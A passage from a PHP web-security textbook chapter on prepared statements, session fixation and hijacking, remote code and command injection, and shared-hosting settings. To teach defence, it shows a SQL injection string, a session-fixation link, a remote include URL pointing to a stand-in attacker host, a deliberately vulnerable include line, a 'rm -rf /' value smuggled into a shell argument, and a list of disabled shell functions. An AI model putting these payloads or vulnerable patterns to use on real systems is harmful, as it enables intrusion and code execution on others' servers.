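    'INSERT INTO users (username, password) VALUES (:username, :password)'
);
$insert->execute(array(
    ':username' => 'alice',
    ':password' => password_hash('s3cret', PASSWORD_DEFAULT),
));

// Hypothetical helper: returns true only for a known user with the right password.
function check_login(PDO $pdo, $username, $password)
{
    // The username travels as a bound parameter, so it is never parsed as SQL.
    $stmt = $pdo->prepare('SELECT password FROM users WHERE username = :username');
    $stmt->execute(array(':username' => $username));

    // fetchColumn() returns false when no row matched.
    $hash = $stmt->fetchColumn();

    // Compare the submitted password against the stored hash.
    return is_string($hash) && password_verify($password, $hash);
}
```

With this version, the injected username from the earlier example is simply treated as a (nonexistent) user name, so check_login($pdo, "username' OR 1 = 1 --", '') fails instead of matching every row.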

Session Security

Two popular forms of session attacks are session fixation and session hijacking. Whereas most of the other attacks described in this chapter can be prevented by filtering input and escaping output, session attacks cannot. Instead, it is necessary to plan for them and identify potential problem areas of your application.

Sessions are discussed in the Web Programming chapter.

When a user first encounters a page in your application that calls session_start(), a session is created for the user. PHP generates a random session identifier to identify the user and then sends a Set-Cookie header to the client. By default, the name of this cookie is PHPSESSID, but it is possible to change the cookie name in php.ini or by using the session_name() function. On subsequent visits, the client sends this cookie back with each request, PHP uses it to find the matching session, and this is how the application maintains state.

You should always use cookie-based sessions. Although there is a directive, session.use_trans_sid, that instructs PHP to append the session identifier to the URLs of your application, doing so exposes the session identifier. Leave this setting at 0 to disable this behavior.

It is possible, however, to set the session identifier manually through the query string, forcing the use of a particular session. This simple attack is called session fixation because the attacker fixes the session. This is most commonly achieved by creating a link to your application and appending the session identifier that the attacker wishes to give any user clicking the link.

<a href="http://example.org/index.php?PHPSESSID=1234">
    Click here
</a>

When the user accesses your site through this session, he may provide sensitive information or even login credentials. If the user logs in while using the provided session identifier, the attacker may be able to “ride” on the same session and gain access to the user’s account. This is why session fixation is sometimes referred to as session riding. Since the purpose of the attack is to gain a higher level of privilege, the points at which the attack should be blocked are clear: every time a user’s access level changes, the session identifier should be regenerated. PHP makes this a simple task with session_regenerate_id().

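session_start();

// authenticate() is a placeholder for your own login check.
// If the user login is successful, regenerate the session ID
if (authenticate()) {
    // Passing true also deletes the old session data
    session_regenerate_id(true);
}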

While this protects users from having their session fixed, and so denies a would-be attacker easy access, it won’t help much against another common session attack known as session hijacking. This is a generic term used to describe any means by which an attacker gains a user’s valid session identifier (rather than providing one of his own).

For example, suppose that a user logs in. If the session identifier is regenerated, she has a new session identifier. What if an attacker discovers this new identifier and attempts to use it to gain access through that user’s session? It is then necessary to use other means to identify the user.

One way to identify the user in addition to the session identifier is to check various request headers sent by the client. One request header that is particularly helpful and does not change between requests is the User-Agent header. Since it is unlikely (at least in most legitimate cases) that a user will change from one browser to another within the same session, this header can be used to determine a possible session hijacking attempt.

After a successful login attempt, store the User-Agent into the session:

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

Then, on subsequent page loads, check to ensure that the User-Agent has not changed. If it has changed, that is cause for concern, and the user should log in again.

if ($_SESSION['user_agent'] !== $_SERVER['HTTP_USER_AGENT']) {
    // Force user to log in again
    exit;
}
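The store-and-compare steps described here can be wrapped in a small helper, sketched below. The function name user_agent_matches() is invented for this example, and the session and server arrays are passed in explicitly (an assumption made so the check can be exercised outside a Web request). Keep in mind that an attacker who can observe the victim's requests can also copy the User-Agent header, so this check raises the bar rather than closing the hole.

```php
<?php
// Hypothetical helper: true only when the stored and current User-Agent agree.
function user_agent_matches(array $session, array $server)
{
    // A missing value on either side is treated as a mismatch.
    if (!isset($session['user_agent'], $server['HTTP_USER_AGENT'])) {
        return false;
    }

    return $session['user_agent'] === $server['HTTP_USER_AGENT'];
}

// Typical use after session_start():
// if (!user_agent_matches($_SESSION, $_SERVER)) {
//     $_SESSION = array();   // drop the suspicious session data
//     /* send the user back to the login page */
//     exit;
// }
```

Treating a missing header as a mismatch is a design choice: it forces a fresh login in ambiguous cases instead of letting the request through.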

Filesystem Security

PHP has the ability to access the filesystem directly and even execute shell commands. While this affords developers great power, it can be very dangerous when tainted data ends up in a command line. Again, proper filtering and escaping can mitigate these risks.

Remote Code Injection

When including files with include and require, pay careful attention when using possibly tainted data to create a dynamic include based on client input; otherwise, a mistake could easily allow would-be hackers to execute a remote code injection attack. A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of his choosing. This can have devastating consequences for both your application and your system.

For example, many applications make use of query string variables such as: http://example.org/?section=news to structure the application into sections. One such application may use an include statement to include a script to display the “news” section:

include "{$_GET['section']}/data.inc.php";

When using the proper URL to access this section, the script will include the file located at news/data.inc.php. However, consider what might happen if an attacker modified the query string to include harmful code located on a remote site. The following URL illustrates how an attacker can do this:

http://example.org/?section=http%3A%2F%2Fevil.example.org%2Fattack.inc%3F

Now, the tainted section value is injected into the include statement, effectively rendering it as:

include "http://evil.example.org/attack.inc?/data.inc.php";

The application will include attack.inc, located on the remote server, which treats /data.inc.php as part of the query string, thus effectively neutralizing its effect within your script. Any PHP code contained in attack.inc is then executed, causing whatever harm the attacker intended.

While this attack is very powerful, effectively granting the attacker all the privileges enjoyed by the Web server, it is easy to protect against it by filtering all input and never using tainted data in an include or require statement. In this example, filtering might be as simple as specifying a certain set of expected values for section:

Listing 13.14: Filtered include script

$clean = array();
$sections = array('home', 'news', 'photos', 'blog');

// Accept only known section names; anything else falls back to 'home'
if (isset($_GET['section']) && in_array($_GET['section'], $sections, true)) {
    $clean['section'] = $_GET['section'];
} else {
    $clean['section'] = 'home';
}

include $clean['section'] . "/data.inc.php";

The allow_url_fopen directive in PHP provides the feature by which PHP can access URLs, treating them like regular files, thus making an attack like the one described here possible. By default, allow_url_fopen is set to On; however, it is possible to disable it in php.ini, setting it to Off, which will prevent your applications from including or opening remote URLs as files (as well as effectively disallowing many of the cool stream features described in the Files and Streams chapter).

The allow_url_include directive enables or disables the use of URLs with include, include_once, require, and require_once. By default it is set to Off. If you need allow_url_fopen, leave allow_url_include disabled to mitigate remote code execution.

Command Injection

Just as allowing client input to dynamically include files is dangerous, so is allowing the client to affect the use of system command execution without strict controls. While PHP provides great power with the exec(), system(), and passthru() functions, as well as the ` (backtick) operator, these must not be used lightly, and it is important to take great care to ensure that attackers cannot inject and execute arbitrary system commands. Again, proper filtering and escaping will mitigate the risk; a whitelist filtering approach that limits the commands that users may execute works quite well here. Also, PHP provides escapeshellcmd() and escapeshellarg() as a means to properly escape shell commands and their arguments.

When possible, avoid the use of shell commands. If they are necessary, avoid the use of client input to construct dynamic shell commands.
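If a shell command truly cannot be avoided, the whitelist-plus-escaping approach might look like the sketch below. The build_command() function, the action names, and the commands they map to are all hypothetical and assume a Unix-like system; only escapeshellarg() is a real PHP function here.

```php
<?php
// Hypothetical helper: maps a whitelisted action to a fixed command and
// appends the client-supplied path as a single escaped argument.
function build_command($action, $path)
{
    // The client picks an action name, never the command itself.
    $allowed = array(
        'list'  => 'ls -l --',
        'count' => 'wc -l --',
    );

    // Reject anything that is not an expected action.
    if (!is_string($action) || !isset($allowed[$action])) {
        return null;
    }

    // escapeshellarg() quotes the value so the shell sees one argument.
    return $allowed[$action] . ' ' . escapeshellarg($path);
}

$command = build_command('list', 'docs; rm -rf /');
// The "; rm -rf /" part stays inside the quoted argument, so passing
// $command to exec() would not start a second command.
```

The fixed command prefixes end in -- so that a path beginning with a dash is not read as an option by ls or wc.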

Shared Hosting

There are a variety of security issues that arise when using shared hosting solutions. In the past, PHP has tried to resolve some of these issues with the safe_mode directive. However, as the PHP manual states, it “is architecturally incorrect to try to solve this problem at the PHP level.” Thus, safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4.

Still, there are three php.ini directives that remain important in a shared hosting environment: open_basedir, disable_functions, and disable_classes. These directives do not depend upon safe_mode, and they will remain available for the foreseeable future.

The open_basedir directive provides the ability to limit the files that PHP can open to a specified directory tree. When PHP tries to open a file with, for example, fopen() or include, it checks the location of the file. If it exists within the directory tree specified by open_basedir, then it will succeed; otherwise, it will fail to open the file. You may set the open_basedir directive in php.ini or on a per-virtual-host basis in httpd.conf. In the following httpd.conf virtual host example, PHP scripts may only open files located in the /home/user/www and /usr/local/lib/php directories (the latter is often the location of the PEAR library):

<VirtualHost *>
    DocumentRoot /home/user/www
    ServerName www.example.org
    <Directory /home/user/www>
        php_admin_value open_basedir "/home/user/www/:/usr/local/lib/php/"
    </Directory>
</VirtualHost>

The disable_functions and disable_classes directives work similarly, allowing you to disable certain native PHP functions and classes for security reasons. Any functions or classes listed in these directives will not be available to PHP applications running on the system. You may only set these in php.ini. The following example illustrates the use of these directives to disable specific functions and classes:

; Disable functions

disable_functions = exec,passthru,shell_exec,system

; Disable classes

disable_classes = DirectoryIterator,Directory
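On a shared host it can be useful to confirm from within a script which functions the administrator has disabled. The following is a rough sketch of such a check; the helper name is_listed_as_disabled() is made up for this example, and the directive value is passed in as a string so the logic can be tried without changing php.ini.

```php
<?php
// Hypothetical helper: checks a function name against a disable_functions value.
function is_listed_as_disabled($function, $iniValue)
{
    // The directive is a comma-separated list; trim stray whitespace around names.
    $disabled = array_map('trim', explode(',', $iniValue));

    return in_array($function, $disabled, true);
}

// At run time the current value can be read with ini_get('disable_functions').
$example = 'exec,passthru,shell_exec,system';
var_dump(is_listed_as_disabled('exec', $example));   // bool(true)
var_dump(is_listed_as_disabled('strlen', $example)); // bool(false)
```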

Summary

This chapter covered some of the most common attacks faced by Web applications and illustrated how you can protect your applications against some of their most common variations—or, at least, mitigate their occurrence.

Despite the many ways your applications can be attacked, four simple words can sum up most solutions to Web application security problems: filter input, escape output. Implementing these security best practices will allow you to make use of the great power provided by PHP, while reducing the power available to potential attackers. However, the responsibility is yours.